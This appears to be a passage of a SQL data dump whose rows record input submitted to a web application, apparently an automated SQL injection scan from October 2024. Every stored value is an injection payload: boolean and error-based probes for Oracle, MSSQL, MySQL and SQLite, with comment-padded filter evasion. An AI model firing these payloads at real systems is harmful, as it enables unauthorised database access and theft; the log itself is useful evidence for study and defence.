(1968, 1, 1, 'fJTD/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(4706/**/BETWEEN/**/4706)/**/AND/**/4706)THEN/**/NULL/**/ELSE/**/CTXSYS.DRITHSX.SN(1,4706)/**/END)/**/FROM/**/DUAL)/**/IS/**/NULL--/**/Jzic', 1, '2024-10-24 19:34:09'),
(1969, 1, 1, 'fJTD\')/**/AND/**/CASE/**/WHEN/**/1656=1228/**/THEN/**/1656/**/ELSE/**/JSON(CHAR(109,84,70,103))/**/END/**/AND/**/(\'SFSP\'=\'SFSP', 3, '2024-10-24 19:34:10'),
(1970, 1, 1, 'fJTD\')/**/AND/**/CASE/**/WHEN/**/1656=1228/**/THEN/**/1656/**/ELSE/**/JSON(CHAR(109,84,70,103))/**/END/**/AND/**/(\'SFSP\'=\'SFSP', 3, '2024-10-24 19:34:12'),
(1971, 1, 1, 'fJTD\')/**/AND/**/CASE/**/WHEN/**/3089=3089/**/THEN/**/3089/**/ELSE/**/JSON(CHAR(65,109,115,71))/**/END/**/AND/**/(\'jErc\'=\'jErc', 3, '2024-10-24 19:34:13'),
(1972, 1, 1, 'fJTD\')/**/AND/**/CASE/**/WHEN/**/3089=3089/**/THEN/**/3089/**/ELSE/**/JSON(CHAR(65,109,115,71))/**/END/**/AND/**/(\'jErc\'=\'jErc', 3, '2024-10-24 19:34:14'),
(1973, 1, 1, 'fJTD\'))/**/AND/**/CASE/**/WHEN/**/9329=7637/**/THEN/**/9329/**/ELSE/**/JSON(CHAR(118,86,101,84))/**/END/**/AND/**/((\'nKCw\'=\'nKCw', 3, '2024-10-24 19:34:15'),
(1974, 1, 1, 'fJTD\'))/**/AND/**/CASE/**/WHEN/**/9329=7637/**/THEN/**/9329/**/ELSE/**/JSON(CHAR(118,86,101,84))/**/END/**/AND/**/((\'nKCw\'=\'nKCw', 3, '2024-10-24 19:34:16'),
(1975, 1, 1, 'fJTD\'))/**/AND/**/CASE/**/WHEN/**/3089=3089/**/THEN/**/3089/**/ELSE/**/JSON(CHAR(65,109,115,71))/**/END/**/AND/**/((\'lKtV\'=\'lKtV', 3, '2024-10-24 19:34:18'),
(1976, 1, 1, 'fJTD\'))/**/AND/**/CASE/**/WHEN/**/3089=3089/**/THEN/**/3089/**/ELSE/**/JSON(CHAR(65,109,115,71))/**/END/**/AND/**/((\'lKtV\'=\'lKtV', 3, '2024-10-24 19:34:19'),
(1977, 1, 1, 'fJTD\'/**/AND/**/CASE/**/WHEN/**/6138=4274/**/THEN/**/6138/**/ELSE/**/JSON(CHAR(101,98,111,119))/**/END/**/AND/**/\'VPLg\'=\'VPLg', 3, '2024-10-24 19:34:20'),
(1978, 1, 1, 'fJTD\'/**/AND/**/CASE/**/WHEN/**/6138=4274/**/THEN/**/6138/**/ELSE/**/JSON(CHAR(101,98,111,119))/**/END/**/AND/**/\'VPLg\'=\'VPLg', 3, '2024-10-24 19:34:21'),
(1979, 1, 1, 'fJTD\'/**/AND/**/CASE/**/WHEN/**/3089=3089/**/THEN/**/3089/**/ELSE/**/JSON(CHAR(65,109,115,71))/**/END/**/AND/**/\'DJNi\'=\'DJNi', 3, '2024-10-24 19:34:22'),
(1980, 1, 1, 'fJTD\'/**/AND/**/CASE/**/WHEN/**/3089=3089/**/THEN/**/3089/**/ELSE/**/JSON(CHAR(65,109,115,71))/**/END/**/AND/**/\'DJNi\'=\'DJNi', 3, '2024-10-24 19:34:23'),
(1981, 1, 1, 'fJTD\')/**/AND/**/CASE/**/WHEN/**/3066=4134/**/THEN/**/3066/**/ELSE/**/JSON(CHAR(100,105,109,68))/**/END/**/AND/**/(\'OEQm\'/**/LIKE/**/\'OEQm', 3, '2024-10-24 19:34:24'),
(1982, 1, 1, 'fJTD\')/**/AND/**/CASE/**/WHEN/**/3066=4134/**/THEN/**/3066/**/ELSE/**/JSON(CHAR(100,105,109,68))/**/END/**/AND/**/(\'OEQm\'/**/LIKE/**/\'OEQm', 3, '2024-10-24 19:34:25'),
(1983, 1, 1, 'fJTD\')/**/AND/**/CASE/**/WHEN/**/3089=3089/**/THEN/**/3089/**/ELSE/**/JSON(CHAR(65,109,115,71))/**/END/**/AND/**/(\'WDnx\'/**/LIKE/**/\'WDnx', 3, '2024-10-24 19:34:27'),
(1984, 1, 1, 'fJTD\')/**/AND/**/CASE/**/WHEN/**/3089=3089/**/THEN/**/3089/**/ELSE/**/JSON(CHAR(65,109,115,71))/**/END/**/AND/**/(\'WDnx\'/**/LIKE/**/\'WDnx', 3, '2024-10-24 19:34:28'),
(1985, 1, 1, 'fJTD%\'/**/AND/**/CASE/**/WHEN/**/4998=2804/**/THEN/**/4998/**/ELSE/**/JSON(CHAR(103,71,113,112))/**/END/**/AND/**/\'XIwA%\'=\'XIwA', 3, '2024-10-24 19:34:30'),
(1986, 1, 1, 'fJTD%\'/**/AND/**/CASE/**/WHEN/**/4998=2804/**/THEN/**/4998/**/ELSE/**/JSON(CHAR(103,71,113,112))/**/END/**/AND/**/\'XIwA%\'=\'XIwA', 3, '2024-10-24 19:34:32'),
(1987, 1, 1, 'fJTD%\'/**/AND/**/CASE/**/WHEN/**/3089=3089/**/THEN/**/3089/**/ELSE/**/JSON(CHAR(65,109,115,71))/**/END/**/AND/**/\'mGiA%\'=\'mGiA', 3, '2024-10-24 19:34:33'),
(1988, 1, 1, 'fJTD%\'/**/AND/**/CASE/**/WHEN/**/3089=3089/**/THEN/**/3089/**/ELSE/**/JSON(CHAR(65,109,115,71))/**/END/**/AND/**/\'mGiA%\'=\'mGiA', 3, '2024-10-24 19:34:34'),
(1989, 1, 1, 'fJTD\'/**/AND/**/CASE/**/WHEN/**/3040=2200/**/THEN/**/3040/**/ELSE/**/JSON(CHAR(67,90,72,84))/**/END/**/AND/**/\'ZYnl\'/**/LIKE/**/\'ZYnl', 3, '2024-10-24 19:34:35'),
(1990, 1, 1, 'fJTD\'/**/AND/**/CASE/**/WHEN/**/3040=2200/**/THEN/**/3040/**/ELSE/**/JSON(CHAR(67,90,72,84))/**/END/**/AND/**/\'ZYnl\'/**/LIKE/**/\'ZYnl', 3, '2024-10-24 19:34:37'),
(1991, 1, 1, 'fJTD\'/**/AND/**/CASE/**/WHEN/**/3089=3089/**/THEN/**/3089/**/ELSE/**/JSON(CHAR(65,109,115,71))/**/END/**/AND/**/\'LSdw\'/**/LIKE/**/\'LSdw', 3, '2024-10-24 19:34:38'),
(1992, 1, 1, 'fJTD\'/**/AND/**/CASE/**/WHEN/**/3089=3089/**/THEN/**/3089/**/ELSE/**/JSON(CHAR(65,109,115,71))/**/END/**/AND/**/\'LSdw\'/**/LIKE/**/\'LSdw', 3, '2024-10-24 19:34:39'),
(1993, 1, 1, 'fJTD\")/**/AND/**/CASE/**/WHEN/**/4386=8187/**/THEN/**/4386/**/ELSE/**/JSON(CHAR(100,69,78,106))/**/END/**/AND/**/(\"tcOB\"=\"tcOB', 3, '2024-10-24 19:34:40'),
(1994, 1, 1, 'fJTD\")/**/AND/**/CASE/**/WHEN/**/4386=8187/**/THEN/**/4386/**/ELSE/**/JSON(CHAR(100,69,78,106))/**/END/**/AND/**/(\"tcOB\"=\"tcOB', 3, '2024-10-24 19:34:41'),
(1995, 1, 1, 'fJTD\")/**/AND/**/CASE/**/WHEN/**/3089=3089/**/THEN/**/3089/**/ELSE/**/JSON(CHAR(65,109,115,71))/**/END/**/AND/**/(\"MlBB\"=\"MlBB', 3, '2024-10-24 19:34:43'),
(1996, 1, 1, 'fJTD\")/**/AND/**/CASE/**/WHEN/**/3089=3089/**/THEN/**/3089/**/ELSE/**/JSON(CHAR(65,109,115,71))/**/END/**/AND/**/(\"MlBB\"=\"MlBB', 3, '2024-10-24 19:34:44'),
(1997, 1, 1, 'fJTD\"/**/AND/**/CASE/**/WHEN/**/9963=3267/**/THEN/**/9963/**/ELSE/**/JSON(CHAR(105,116,122,85))/**/END/**/AND/**/\"cWCl\"=\"cWCl', 3, '2024-10-24 19:34:45'),
(1998, 1, 1, 'fJTD\"/**/AND/**/CASE/**/WHEN/**/9963=3267/**/THEN/**/9963/**/ELSE/**/JSON(CHAR(105,116,122,85))/**/END/**/AND/**/\"cWCl\"=\"cWCl', 3, '2024-10-24 19:34:46'),
(1999, 1, 1, 'fJTD\"/**/AND/**/CASE/**/WHEN/**/3089=3089/**/THEN/**/3089/**/ELSE/**/JSON(CHAR(65,109,115,71))/**/END/**/AND/**/\"VzVH\"=\"VzVH', 3, '2024-10-24 19:34:47'),
(2000, 1, 1, 'fJTD\"/**/AND/**/CASE/**/WHEN/**/3089=3089/**/THEN/**/3089/**/ELSE/**/JSON(CHAR(65,109,115,71))/**/END/**/AND/**/\"VzVH\"=\"VzVH', 3, '2024-10-24 19:34:48'),
(2001, 1, 1, 'fJTD)/**/AND/**/CASE/**/WHEN/**/9270=2333/**/THEN/**/9270/**/ELSE/**/JSON(CHAR(111,109,79,78))/**/END/**/AND/**/(7769/**/BETWEEN/**/7769/**/AND/**/7769', 3, '2024-10-24 19:34:50'),
(2002, 1, 1, 'fJTD)/**/AND/**/CASE/**/WHEN/**/9270=2333/**/THEN/**/9270/**/ELSE/**/JSON(CHAR(111,109,79,78))/**/END/**/AND/**/(7769/**/BETWEEN/**/7769/**/AND/**/7769', 3, '2024-10-24 19:34:51'),
(2003, 1, 1, 'fJTD)/**/AND/**/CASE/**/WHEN/**/3089=3089/**/THEN/**/3089/**/ELSE/**/JSON(CHAR(65,109,115,71))/**/END/**/AND/**/(6135/**/BETWEEN/**/6135/**/AND/**/6135', 3, '2024-10-24 19:34:52'),
(2004, 1, 1, 'fJTD)/**/AND/**/CASE/**/WHEN/**/3089=3089/**/THEN/**/3089/**/ELSE/**/JSON(CHAR(65,109,115,71))/**/END/**/AND/**/(6135/**/BETWEEN/**/6135/**/AND/**/6135', 3, '2024-10-24 19:34:53'),
(2005, 1, 1, 'fJTD))/**/AND/**/CASE/**/WHEN/**/9984=8539/**/THEN/**/9984/**/ELSE/**/JSON(CHAR(122,121,119,83))/**/END/**/AND/**/((1664/**/BETWEEN/**/1664/**/AND/**/1664', 3, '2024-10-24 19:34:55'),
(2006, 1, 1, 'fJTD))/**/AND/**/CASE/**/WHEN/**/9984=8539/**/THEN/**/9984/**/ELSE/**/JSON(CHAR(122,121,119,83))/**/END/**/AND/**/((1664/**/BETWEEN/**/1664/**/AND/**/1664', 3, '2024-10-24 19:34:56'),
(2007, 1, 1, 'fJTD))/**/AND/**/CASE/**/WHEN/**/3089=3089/**/THEN/**/3089/**/ELSE/**/JSON(CHAR(65,109,115,71))/**/END/**/AND/**/((3564/**/BETWEEN/**/3564/**/AND/**/3564', 3, '2024-10-24 19:34:57'),
(2008, 1, 1, 'fJTD))/**/AND/**/CASE/**/WHEN/**/3089=3089/**/THEN/**/3089/**/ELSE/**/JSON(CHAR(65,109,115,71))/**/END/**/AND/**/((3564/**/BETWEEN/**/3564/**/AND/**/3564', 3, '2024-10-24 19:34:58'),
(2009, 1, 1, 'fJTD/**/AND/**/CASE/**/WHEN/**/8451/**/BETWEEN/**/8807/**/AND/**/8807THEN/**/8451/**/ELSE/**/JSON(CHAR(87,77,90,70))/**/END', 3, '2024-10-24 19:35:00'),
(2010, 1, 1, 'fJTD/**/AND/**/CASE/**/WHEN/**/8451/**/BETWEEN/**/8807/**/AND/**/8807THEN/**/8451/**/ELSE/**/JSON(CHAR(87,77,90,70))/**/END', 3, '2024-10-24 19:35:01'),
(2011, 1, 1, 'fJTD/**/AND/**/CASE/**/WHEN/**/3089/**/BETWEEN/**/3089/**/AND/**/3089THEN/**/3089/**/ELSE/**/JSON(CHAR(65,109,115,71))/**/END', 3, '2024-10-24 19:35:03'),
(2012, 1, 1, 'fJTD/**/AND/**/CASE/**/WHEN/**/3089/**/BETWEEN/**/3089/**/AND/**/3089THEN/**/3089/**/ELSE/**/JSON(CHAR(65,109,115,71))/**/END', 3, '2024-10-24 19:35:04'),
(2013, 1, 1, 'fJTD/**/AND/**/CASE/**/WHEN/**/7378/**/BETWEEN/**/5793/**/AND/**/5793THEN/**/7378/**/ELSE/**/JSON(CHAR(104,119,74,107))/**/END--/**/iUOt', 3, '2024-10-24 19:35:05'),
(2014, 1, 1, 'fJTD/**/AND/**/CASE/**/WHEN/**/7378/**/BETWEEN/**/5793/**/AND/**/5793THEN/**/7378/**/ELSE/**/JSON(CHAR(104,119,74,107))/**/END--/**/iUOt', 3, '2024-10-24 19:35:06'),
(2015, 1, 1, 'fJTD/**/AND/**/CASE/**/WHEN/**/3089/**/BETWEEN/**/3089/**/AND/**/3089THEN/**/3089/**/ELSE/**/JSON(CHAR(65,109,115,71))/**/END--/**/lMYN', 3, '2024-10-24 19:35:07'),
(2016, 1, 1, 'fJTD/**/AND/**/CASE/**/WHEN/**/3089/**/BETWEEN/**/3089/**/AND/**/3089THEN/**/3089/**/ELSE/**/JSON(CHAR(65,109,115,71))/**/END--/**/lMYN', 3, '2024-10-24 19:35:09'),
(2017, 1, 1, '(CASE/**/WHEN/**/5529=6717/**/THEN/**/5529/**/ELSE/**/NULL/**/END)', 1, '2024-10-24 19:35:16'),
(2018, 1, 1, '(CASE/**/WHEN/**/5529=6717/**/THEN/**/5529/**/ELSE/**/NULL/**/END)', 1, '2024-10-24 19:35:17'),
(2019, 1, 1, '(CASE/**/WHEN/**/3490=3490/**/THEN/**/3490/**/ELSE/**/NULL/**/END)', 1, '2024-10-24 19:35:18'),
(2020, 1, 1, '(CASE/**/WHEN/**/3490=3490/**/THEN/**/3490/**/ELSE/**/NULL/**/END)', 1, '2024-10-24 19:35:19'),
(2021, 1, 1, 'fJTD\'/**/AND/**/2302=CONVERT(INT,(SELECT/**/CHAR(113) CHAR(98) CHAR(122) CHAR(118) CHAR(113) (SELECT/**/(CASE/**/WHEN/**/(2302=2302)/**/THEN/**/CHAR(49)/**/ELSE/**/CHAR(48)/**/END)) CHAR(113) CHAR(106) CHAR(113) CHAR(122) CHAR(113)))/**/AND/**/\'thqL\'=\'thq', 3, '2024-10-24 19:37:35'),
(2022, 1, 1, 'fJTD\')/**/AND/**/2302=CONVERT(INT,(SELECT/**/CHAR(113) CHAR(98) CHAR(122) CHAR(118) CHAR(113) (SELECT/**/(CASE/**/WHEN/**/(2302=2302)/**/THEN/**/CHAR(49)/**/ELSE/**/CHAR(48)/**/END)) CHAR(113) CHAR(106) CHAR(113) CHAR(122) CHAR(113)))/**/AND/**/(\'WqLl\'/**', 3, '2024-10-24 19:37:37'),
(2023, 1, 1, 'fJTD%\'/**/AND/**/2302=CONVERT(INT,(SELECT/**/CHAR(113) CHAR(98) CHAR(122) CHAR(118) CHAR(113) (SELECT/**/(CASE/**/WHEN/**/(2302=2302)/**/THEN/**/CHAR(49)/**/ELSE/**/CHAR(48)/**/END)) CHAR(113) CHAR(106) CHAR(113) CHAR(122) CHAR(113)))/**/AND/**/\'hzce%\'=\'h', 3, '2024-10-24 19:37:38'),
(2024, 1, 1, 'fJTD\'/**/AND/**/2302=CONVERT(INT,(SELECT/**/CHAR(113) CHAR(98) CHAR(122) CHAR(118) CHAR(113) (SELECT/**/(CASE/**/WHEN/**/(2302=2302)/**/THEN/**/CHAR(49)/**/ELSE/**/CHAR(48)/**/END)) CHAR(113) CHAR(106) CHAR(113) CHAR(122) CHAR(113)))/**/AND/**/\'WycF\'/**/L', 3, '2024-10-24 19:37:40'),
(2025, 1, 1, 'fJTD\")/**/AND/**/2302=CONVERT(INT,(SELECT/**/CHAR(113) CHAR(98) CHAR(122) CHAR(118) CHAR(113) (SELECT/**/(CASE/**/WHEN/**/(2302=2302)/**/THEN/**/CHAR(49)/**/ELSE/**/CHAR(48)/**/END)) CHAR(113) CHAR(106) CHAR(113) CHAR(122) CHAR(113)))/**/AND/**/(\"ZvWy\"=\"Z', 3, '2024-10-24 19:37:41'),
(2026, 1, 1, 'fJTD\"/**/AND/**/2302=CONVERT(INT,(SELECT/**/CHAR(113) CHAR(98) CHAR(122) CHAR(118) CHAR(113) (SELECT/**/(CASE/**/WHEN/**/(2302=2302)/**/THEN/**/CHAR(49)/**/ELSE/**/CHAR(48)/**/END)) CHAR(113) CHAR(106) CHAR(113) CHAR(122) CHAR(113)))/**/AND/**/\"zhsT\"=\"zhs', 3, '2024-10-24 19:37:43'),
(2027, 1, 1, 'fJTD)/**/AND/**/2302=CONVERT(INT,(SELECT/**/CHAR(113) CHAR(98) CHAR(122) CHAR(118) CHAR(113) (SELECT/**/(CASE/**/WHEN/**/(2302=2302)/**/THEN/**/CHAR(49)/**/ELSE/**/CHAR(48)/**/END)) CHAR(113) CHAR(106) CHAR(113) CHAR(122) CHAR(113)))/**/AND/**/(9976/**/BE', 3, '2024-10-24 19:37:46'),
(2028, 1, 1, 'fJTD))/**/AND/**/2302=CONVERT(INT,(SELECT/**/CHAR(113) CHAR(98) CHAR(122) CHAR(118) CHAR(113) (SELECT/**/(CASE/**/WHEN/**/(2302=2302)/**/THEN/**/CHAR(49)/**/ELSE/**/CHAR(48)/**/END)) CHAR(113) CHAR(106) CHAR(113) CHAR(122) CHAR(113)))/**/AND/**/((8842/**/', 3, '2024-10-24 19:37:49'),
(2029, 1, 1, 'fJTD/**/AND/**/2302/**/BETWEEN/**/CONVERT(INT/**/AND/**/CONVERT(INT,(SELECT/**/CHAR(113) CHAR(98) CHAR(122) CHAR(118) CHAR(113) (SELECT/**/(CASE/**/WHEN/**/(2302=2302)/**/THEN/**/CHAR(49)/**/ELSE/**/CHAR(48)/**/END)) CHAR(113) CHAR(106) CHAR(113) CHAR(122', 3, '2024-10-24 19:37:50'),
(2030, 1, 1, 'fJTD/**/AND/**/2302/**/BETWEEN/**/CONVERT(INT/**/AND/**/CONVERT(INT,(SELECT/**/CHAR(113) CHAR(98) CHAR(122) CHAR(118) CHAR(113) (SELECT/**/(CASE/**/WHEN/**/(2302=2302)/**/THEN/**/CHAR(49)/**/ELSE/**/CHAR(48)/**/END)) CHAR(113) CHAR(106) CHAR(113) CHAR(122', 3, '2024-10-24 19:37:52'),
(2031, 1, 1, 'fJTD\')/**/AND/**/1929=CONCAT(CHAR(113) CHAR(98) CHAR(122) CHAR(118) CHAR(113),(SELECT/**/(CASE/**/WHEN/**/(1929=1929)/**/THEN/**/CHAR(49)/**/ELSE/**/CHAR(48)/**/END)),CHAR(113) CHAR(106) CHAR(113) CHAR(122) CHAR(113))/**/AND/**/(\'MUgq\'=\'MUgq', 3, '2024-10-24 19:37:54'),
(2032, 1, 1, 'fJTD\'))/**/AND/**/1929=CONCAT(CHAR(113) CHAR(98) CHAR(122) CHAR(118) CHAR(113),(SELECT/**/(CASE/**/WHEN/**/(1929=1929)/**/THEN/**/CHAR(49)/**/ELSE/**/CHAR(48)/**/END)),CHAR(113) CHAR(106) CHAR(113) CHAR(122) CHAR(113))/**/AND/**/((\'COoL\'=\'COoL', 3, '2024-10-24 19:37:55'),
(2033, 1, 1, 'fJTD\'/**/AND/**/1929=CONCAT(CHAR(113) CHAR(98) CHAR(122) CHAR(118) CHAR(113),(SELECT/**/(CASE/**/WHEN/**/(1929=1929)/**/THEN/**/CHAR(49)/**/ELSE/**/CHAR(48)/**/END)),CHAR(113) CHAR(106) CHAR(113) CHAR(122) CHAR(113))/**/AND/**/\'Yvxb\'=\'Yvxb', 3, '2024-10-24 19:37:57'),
(2034, 1, 1, 'fJTD\')/**/AND/**/1929=CONCAT(CHAR(113) CHAR(98) CHAR(122) CHAR(118) CHAR(113),(SELECT/**/(CASE/**/WHEN/**/(1929=1929)/**/THEN/**/CHAR(49)/**/ELSE/**/CHAR(48)/**/END)),CHAR(113) CHAR(106) CHAR(113) CHAR(122) CHAR(113))/**/AND/**/(\'XzjF\'/**/LIKE/**/\'XzjF', 3, '2024-10-24 19:37:58'),
(2035, 1, 1, 'fJTD%\'/**/AND/**/1929=CONCAT(CHAR(113) CHAR(98) CHAR(122) CHAR(118) CHAR(113),(SELECT/**/(CASE/**/WHEN/**/(1929=1929)/**/THEN/**/CHAR(49)/**/ELSE/**/CHAR(48)/**/END)),CHAR(113) CHAR(106) CHAR(113) CHAR(122) CHAR(113))/**/AND/**/\'FmEr%\'=\'FmEr', 3, '2024-10-24 19:38:00'),
(2036, 1, 1, 'fJTD\'/**/AND/**/1929=CONCAT(CHAR(113) CHAR(98) CHAR(122) CHAR(118) CHAR(113),(SELECT/**/(CASE/**/WHEN/**/(1929=1929)/**/THEN/**/CHAR(49)/**/ELSE/**/CHAR(48)/**/END)),CHAR(113) CHAR(106) CHAR(113) CHAR(122) CHAR(113))/**/AND/**/\'LdoQ\'/**/LIKE/**/\'LdoQ', 3, '2024-10-24 19:38:01'),
(2037, 1, 1, 'fJTD\")/**/AND/**/1929=CONCAT(CHAR(113) CHAR(98) CHAR(122) CHAR(118) CHAR(113),(SELECT/**/(CASE/**/WHEN/**/(1929=1929)/**/THEN/**/CHAR(49)/**/ELSE/**/CHAR(48)/**/END)),CHAR(113) CHAR(106) CHAR(113) CHAR(122) CHAR(113))/**/AND/**/(\"TCXs\"=\"TCXs', 3, '2024-10-24 19:38:05'),
(2038, 1, 1, 'fJTD\"/**/AND/**/1929=CONCAT(CHAR(113) CHAR(98) CHAR(122) CHAR(118) CHAR(113),(SELECT/**/(CASE/**/WHEN/**/(1929=1929)/**/THEN/**/CHAR(49)/**/ELSE/**/CHAR(48)/**/END)),CHAR(113) CHAR(106) CHAR(113) CHAR(122) CHAR(113))/**/AND/**/\"Pbbe\"=\"Pbbe', 3, '2024-10-24 19:38:06'),
(2039, 1, 1, 'fJTD)/**/AND/**/1929=CONCAT(CHAR(113) CHAR(98) CHAR(122) CHAR(118) CHAR(113),(SELECT/**/(CASE/**/WHEN/**/(1929=1929)/**/THEN/**/CHAR(49)/**/ELSE/**/CHAR(48)/**/END)),CHAR(113) CHAR(106) CHAR(113) CHAR(122) CHAR(113))/**/AND/**/(7143/**/BETWEEN/**/7143/**/', 3, '2024-10-24 19:38:09'),
(2040, 1, 1, 'fJTD))/**/AND/**/1929=CONCAT(CHAR(113) CHAR(98) CHAR(122) CHAR(118) CHAR(113),(SELECT/**/(CASE/**/WHEN/**/(1929=1929)/**/THEN/**/CHAR(49)/**/ELSE/**/CHAR(48)/**/END)),CHAR(113) CHAR(106) CHAR(113) CHAR(122) CHAR(113))/**/AND/**/((5058/**/BETWEEN/**/5058/*', 3, '2024-10-24 19:38:10'),
(2041, 1, 1, 'fJTD/**/AND/**/1929/**/BETWEEN/**/CONCAT(CHAR(113)/**/AND/**/CONCAT(CHAR(113) CHAR(98) CHAR(122) CHAR(118) CHAR(113),(SELECT/**/(CASE/**/WHEN/**/(1929=1929)/**/THEN/**/CHAR(49)/**/ELSE/**/CHAR(48)/**/END)),CHAR(113) CHAR(106) CHAR(113) CHAR(122) CHAR(113)', 3, '2024-10-24 19:38:12'),
(2042, 1, 1, 'fJTD/**/AND/**/1929/**/BETWEEN/**/CONCAT(CHAR(113)/**/AND/**/CONCAT(CHAR(113) CHAR(98) CHAR(122) CHAR(118) CHAR(113),(SELECT/**/(CASE/**/WHEN/**/(1929=1929)/**/THEN/**/CHAR(49)/**/ELSE/**/CHAR(48)/**/END)),CHAR(113) CHAR(106) CHAR(113) CHAR(122) CHAR(113)', 3, '2024-10-24 19:38:13'),
(2043, 1, 1, 'fJTD\')/**/AND/**/8183=(SELECT/**/UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113)||(SELECT/**/(CASE/**/WHEN/**/(8183=8183)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)|', 1, '2024-10-24 19:38:17'),
(2044, 1, 1, 'fJTD\'))/**/AND/**/8183=(SELECT/**/UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113)||(SELECT/**/(CASE/**/WHEN/**/(8183=8183)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)', 1, '2024-10-24 19:38:20'),
(2045, 1, 1, 'fJTD\'/**/AND/**/8183=(SELECT/**/UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113)||(SELECT/**/(CASE/**/WHEN/**/(8183=8183)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)||', 1, '2024-10-24 19:38:21'),
(2046, 1, 1, 'fJTD\')/**/AND/**/8183=(SELECT/**/UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113)||(SELECT/**/(CASE/**/WHEN/**/(8183=8183)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)|', 1, '2024-10-24 19:38:23'),
(2047, 1, 1, 'fJTD%\'/**/AND/**/8183=(SELECT/**/UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113)||(SELECT/**/(CASE/**/WHEN/**/(8183=8183)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)|', 1, '2024-10-24 19:38:25'),
(2048, 1, 1, 'fJTD\'/**/AND/**/8183=(SELECT/**/UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113)||(SELECT/**/(CASE/**/WHEN/**/(8183=8183)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)||', 1, '2024-10-24 19:38:27'),
(2049, 1, 1, 'fJTD\")/**/AND/**/8183=(SELECT/**/UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113)||(SELECT/**/(CASE/**/WHEN/**/(8183=8183)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)|', 1, '2024-10-24 19:38:29'),
(2050, 1, 1, 'fJTD\"/**/AND/**/8183=(SELECT/**/UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113)||(SELECT/**/(CASE/**/WHEN/**/(8183=8183)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)||', 1, '2024-10-24 19:38:30'),
(2051, 1, 1, 'fJTD)/**/AND/**/8183=(SELECT/**/UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113)||(SELECT/**/(CASE/**/WHEN/**/(8183=8183)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)||', 1, '2024-10-24 19:38:32'),
(2052, 1, 1, 'fJTD))/**/AND/**/8183=(SELECT/**/UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113)||(SELECT/**/(CASE/**/WHEN/**/(8183=8183)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)|', 1, '2024-10-24 19:38:34'),
(2053, 1, 1, 'fJTD/**/AND/**/8183/**/BETWEEN/**/(SELECT/**/AND/**/(SELECTUPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113)||(SELECT/**/(CASE/**/WHEN/**/(8183=8183)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)||CHR(113)||CHR(106)||CHR', 1, '2024-10-24 19:38:36'),
(2054, 1, 1, 'fJTD/**/AND/**/8183/**/BETWEEN/**/(SELECT/**/AND/**/(SELECTUPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113)||(SELECT/**/(CASE/**/WHEN/**/(8183=8183)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)||CHR(113)||CHR(106)||CHR', 1, '2024-10-24 19:38:38'),
(2055, 1, 1, '-5874\')/**/OR/**/8450=(SELECT/**/UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113)||(SELECT/**/(CASE/**/WHEN/**/(8450=8450)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)|', 1, '2024-10-24 19:38:39'),
(2056, 1, 1, '-6190\'))/**/OR/**/8450=(SELECT/**/UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113)||(SELECT/**/(CASE/**/WHEN/**/(8450=8450)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)', 1, '2024-10-24 19:38:41'),
